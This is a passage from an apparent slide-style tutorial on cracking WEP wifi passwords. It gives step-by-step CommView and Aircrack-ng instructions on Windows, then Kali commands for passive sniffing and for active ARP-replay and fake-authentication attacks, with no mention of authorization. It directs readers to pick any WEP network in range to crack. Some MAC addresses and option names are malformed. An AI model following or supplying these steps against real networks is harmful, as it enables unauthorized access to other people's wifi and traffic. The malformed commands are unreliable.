    • CommView for WiFi.
    • Aircrack-ng GUI for Windows.
    • A compatible wifi card that supports monitor mode.
    Step1: Start the CommView app. It will put your network adapter in monitor mode and allow you to record data packets being transmitted across all the wifi networks within range. Select any WEP network that you want to crack; choose a network that has a good signal strength.
    Step2: Right click on the WEP network and select the Copy MAC Address option.
    Step3: Select the Rules tab in the menu at the top. Select MAC address in the left column, enable MAC address rules in the center, select Capture under Action and Both under Add Record, paste the copied MAC address and press Add MAC Address.
    Step4: Click on the Logging tab, enable auto-saving and increase the maximum directory size and average log file size options.
    Step5: Now wait until CommView records around 10,000 data packets. Monitor the number of data packets by clicking on the Packets tab.
    Step6: When you have around 10,000 data packets, go to the Logging tab and click the CONCATENATE LOGS button, select all the capture files and save the combined log file anywhere on your computer.
  • 8. Step7: Double click on the log file; if you notice, 9247 data packets have been recorded in this log file.
    Step8: Click on File > Export Logs > Wireshark/Tcpdump format and save the log file in the selected format anywhere on your computer.
    Step9: Unzip the downloaded file of the Aircrack-ng GUI and launch the Aircrack GUI application from the BIN folder.
    Step10: Aircrack-ng will launch and will automatically try to crack the password. In this case, if you notice, it failed and tells me to try recording more data packets/IVs.
    Step11: Let's wait till I have recorded 21628 data packets/IVs.
    Step12: Input the log files into Aircrack-ng and let's try again!
    Step13: And now when I run Aircrack-ng again, it cracks the password and displays it on the screen! As simple as that.
  • 10. * WEP CRACKING USING KALI
    You require the following to crack a WEP network using Kali:
    * Kali Linux (VMware or ISO).
    * Aircrack-ng.
    * A compatible wifi network card.
    The Aircrack-ng suite comes with the following set of tools: 1) Airmon-ng 2) Airodump-ng 3) Aireplay-ng 4) Aircrack-ng
    WEP cracking using Kali is of two types: 1) PASSIVE technique 2) ACTIVE technique
    PASSIVE WEP CRACKING TECHNIQUE
    Passive WEP cracking is a technique where the attacker tries to crack the password by passively sniffing IVs of the target network without sending/injecting any traffic to it.
    Step1: PUT YOUR WiFi CARD INTO MONITOR MODE: Put your wifi card in monitor mode so that it can listen to all packets being transmitted and not just packets sent to your system.
        airmon-ng start wifi_interface_name
    For example,
        airmon-ng start wlan0
  • 11. a) Check the status of network interfaces:
        ifconfig
    b) Put the wifi interface into monitor mode:
        airmon-ng start wlan0
    c) Ensure the wifi interface is in monitor mode:
        ifconfig
    (NOTE: if you notice, a secondary interface called mon0 is used when your wifi interface is put into monitor mode)
    d) Let's see what wifi networks we are able to catch:
        airodump-ng wlan0
    Step2: START DATA SNIFFER TO RECORD IVs: Capture IVs of data packets being transmitted on only the target wifi network and ignore all other data packets:
        airodump-ng -c channel --bssid APMAC -w outputfile interface
        airodump-ng -c 1 --bssid 48:28:2F:DC:F5:D8 -w dump wlan0
    Capture IVs of data packets being transmitted only on the target WEP network and ignore the rest.
    Step3: CRACK THE WEP PASSWORD FROM THE CAPTURED IVs: Once you have captured enough IVs (20,000-40,000) you can crack the WEP password using the aircrack tool:
        aircrack-ng -b AP_MAC *.cap
    Another alternative technique is to use the FMS/KoreK technique:
        aircrack-ng -k -b AP_MAC *.cap
    For example, in today's example I will type:
        aircrack-ng -b 48:28:2F:D5:D8 dump*.cap
  • 12. Step4: LET’S SEE WHAT WiFi NETWORKS WE ARE ABLE TO CATCH:
        airodump-ng wlan0
    Important: Identify the BSSID (48:28:2F:D5:D8) and channel (1) of the wifi network you wish to crack and write them down somewhere; you will need them in the next step.
    * ACTIVE CRACKING WEP PASSWORD USING KALI
    The problem with passive WEP cracking is that it can take a very long time, since you have to wait for an adequate number of IVs to be captured, which can take 3-4 hours if there is not enough traffic/active clients on the target wifi. In active WEP cracking, the attacker actively injects data packets into the target wifi network to generate additional IVs and reduce the amount of time it takes to crack the password.
    Step1: PUT YOUR WiFi CARD INTO MONITOR MODE: Put the wireless interface in monitor mode on the AP channel so that it can listen to all packets being transmitted and not just packets sent to your system. For example,
        airmon-ng start wlan0
    Step2: TEST WHETHER INJECTION IS POSSIBLE OR NOT: Test whether your wifi card and the target wifi router are within close enough range for your computer to be able to inject data packets into it. Not all wifi cards support data injection.
        aireplay-ng -9 interfacename
    For example,
        aireplay-ng -9 mon0
  • 13. Step3: START DATA SNIFFER TO RECORD IVs: Capture IVs of the data packets being transmitted on only the target wifi network and ignore all other data packets.
        airodump-ng -c channel --bssid APMAC -w output interface
        airodump-ng -c 1 --bssid 48:28:2F:D5:D8 -w dump mon0
    Step4: ARP REQUEST REPLAY ATTACK: In order to crack WEP keys it is important for an attacker to be able to record a large number of IVs from data packets being sent across the target network. An ARP request replay attack can easily be executed using the aireplay-ng tool:
        aireplay-ng --arpreplay -b AP_MAC_FACKE_auth interfacename
    For example,
        aireplay-ng --arpreplay -b 48:28:2F:DC:F5:D8 mon0
    Step5: FAKE AUTHENTICATION ATTACK: In the ARP request replay attack, the attacker sends an ARP packet to the router of the target wifi network AP so that it will generate more IVs. A fake authentication attack allows an attacker to associate its MAC address with the AP, so that it will not reject the ARP packets sent to it in the ARP request replay attack. This ensures that the target AP will generate new IVs that can then be sniffed by the attacker to crack the WEP key.
        aireplay-ng -1 0 -e ESSID -a AP_MAC interfacename
    Step6: ARP REQUEST REPLAY ATTACK (ALTERNATE TECHNIQUE): In case airodump-ng shows you some other device that is already associated with the target wifi AP, then you can skip fake authentication and directly perform the ARP request replay attack using the MAC address of the associated device. For example,
        aireplay-ng --arpreplay -b 48:28:2F:D5:D8 -h 1C:65:9D:C6:47:29 mon0
    (where -h is used to specify the MAC address of the associated device).
  • 14. Step7: CRACK THE WEP PASSWORD FROM THE CAPTURED IVs: Once you have captured enough IVs, you can try to crack the WEP password using the aircrack tool:
        aircrack-ng -b AP_MAC *.cap
    Another alternative technique is to use the FMS/KoreK technique:
        aircrack-ng -k -b AP_MAC *.cap
    Crack the WEP password from the captured IVs:
        aircrack-ng -b 48:28:2F:D5:D8 dump*.cap
    After 15,000 IVs the WEP password has now been cracked.